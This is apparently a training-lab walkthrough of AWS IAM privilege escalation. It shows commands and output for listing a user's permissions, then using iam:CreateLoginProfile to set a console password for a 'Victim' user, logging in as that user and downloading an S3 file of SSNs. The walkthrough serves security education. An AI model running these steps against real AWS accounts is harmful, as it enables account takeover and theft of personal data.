Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile. (The use of --profile is optional and simply helps separate credentials on your local machine)
aws configure --profile createlogin
To get started, let’s prove that our current user has no access to S3:
❯ aws s3 ls --profile createlogin
An error occurred (AccessDenied) when calling the ListBuckets operation: User: arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Attacker is not authorized to perform: s3:ListAllMyBuckets because no identity-based policy allows the s3:ListAllMyBuckets action
Good, let’s proceed!
Enumerate your user’s permissions:
aws iam list-groups --profile createlogin
Code language: PHP (php)
{
"Groups": [
{
"Path": "/",
"GroupName": "iam-createloginprofile-privesc-1701380454738-Developers",
"GroupId": "AGPA5M7PA4Z5SDKOU4LG7",
"Arn": "arn:aws:iam::921234892411:group/iam-createloginprofile-privesc-1701380454738-Developers",
"CreateDate": "2023-11-30T21:41:01+00:00"
}
]
}
Code language: JSON / JSON with Comments (json)
List policies for this group:
aws iam list-group-policies --group-name iam-createloginprofile-privesc-1701380454738-Developers --profile createlogin
Code language: PHP (php)
{
"PolicyNames": [
"iam-createloginprofile-privesc-1701380454738-policy"
]
}
Code language: JSON / JSON with Comments (json)
Now list the permissions in this policy:
aws iam get-group-policy --group-name iam-createloginprofile-privesc-1701380454738-Developers --policy-name iam-createloginprofile-privesc-1701380454738-policy --profile createlogin
Code language: JavaScript (javascript)
{
"GroupName": "iam-createloginprofile-privesc-1701380454738-Developers",
"PolicyName": "iam-createloginprofile-privesc-1701380454738-policy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"iam:CreateLoginProfile",
"iam:ListAccessKeys",
"iam:ListAttachedUserPolicies"
],
"Resource": [
"arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Attacker",
"arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Victim"
],
"Effect": "Allow"
},
{
"Action": [
"iam:ListGroupPolicies",
"iam:ListPolicies",
"iam:ListPolicyVersions",
"iam:ListUserPolicies",
"iam:ListUsers",
"iam:ListGroups",
"iam:ListGroupsForUser",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:GetUser",
"iam:GetUserPolicy",
"iam:GetGroupPolicy"
],
"Resource": "*",
"Effect": "Allow"
}
]
}
}
Code language: JSON / JSON with Comments (json)
By viewing your policy, you get quite a bit of information back. Including that you are able to list users in this account:
aws iam list-users --profile createlogin
Code language: PHP (php)
{
"Users": [
{
"Path": "/",
"UserName": "iam-createloginprofile-privesc-1701380454738-Attacker",
"UserId": "AIDA5M7PA4Z55NCIDD57K",
"Arn": "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Attacker",
"CreateDate": "2023-11-30T21:41:01+00:00"
},
{
"Path": "/",
"UserName": "iam-createloginprofile-privesc-1701380454738-Victim",
"UserId": "AIDA5M7PA4Z54CRXUYOIV",
"Arn": "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Victim",
"CreateDate": "2023-11-30T21:41:23+00:00"
}
]
}
Code language: JSON / JSON with Comments (json)
This result gives you 2 critical pieces of information:
- The target username (in my case): iam-createloginprofile-privesc-1701380454738-Victim
- The AWS account ID (in my case):
921234892411
Using that, we can run this command:
aws iam create-login-profile --user-name iam-createloginprofile-privesc-1701380454738-Victim --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile createlogin
Code language: JavaScript (javascript)
Which returns:
{
"LoginProfile": {
"UserName": "iam-createloginprofile-privesc-1701380454738-Victim",
"CreateDate": "2023-11-30T21:46:56+00:00",
"PasswordResetRequired": false
}
}
Code language: JSON / JSON with Comments (json)
We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:
https://signin.aws.amazon.com/signin
Once logged in (sometimes it can be finicky), make sure you change to “N. Virginia” as the region. It might default to something else.
From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download.
You will now have those sensitive files downloaded to your local computer. Open the ssn.csv file and look for “Holly Duncan” so that you can copy/paste the SSN number and submit it to the lab.
Responses